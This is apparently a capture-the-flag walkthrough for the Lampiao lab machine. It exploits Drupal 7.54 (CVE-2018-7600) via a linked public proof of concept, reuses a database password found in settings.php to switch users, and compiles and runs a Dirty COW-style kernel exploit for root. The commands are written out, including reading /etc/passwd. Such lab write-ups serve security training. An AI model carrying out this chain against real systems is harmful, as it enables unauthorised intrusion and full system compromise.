Lampiao is a Drupal 7.54 machine vulnerable to CVE‑2018‑7600. After gaining a shell, database credentials lead to a local user, and a kernel exploit can be used for root.
Target: Lampiao
Initial vector: Drupal 7.54 RCE (CVE‑2018‑7600)
Privilege escalation: kernel exploit (Dirty COW variant)
Identify Drupal 7.54 and use the public PoC:
https://github.com/firefart/CVE-2018-7600/blob/master/poc.py
Use it to execute commands and obtain a shell.
Check Drupal settings:
/var/www/html/sites/default/settings/settings.php -> drupaluser : Virgulino
Enumerate system users:
$ cat /etc/passwd -> tiago
Switch to tiago:
$ su tiago Password: Virgulino $ id; whoami
A Dirty COW‑style exploit can be used:
$ gcc -pthread dirty.c -o dirty -lcrypt $ ./dirty
On some runs the machine may crash, but the intended path is kernel exploitation to root.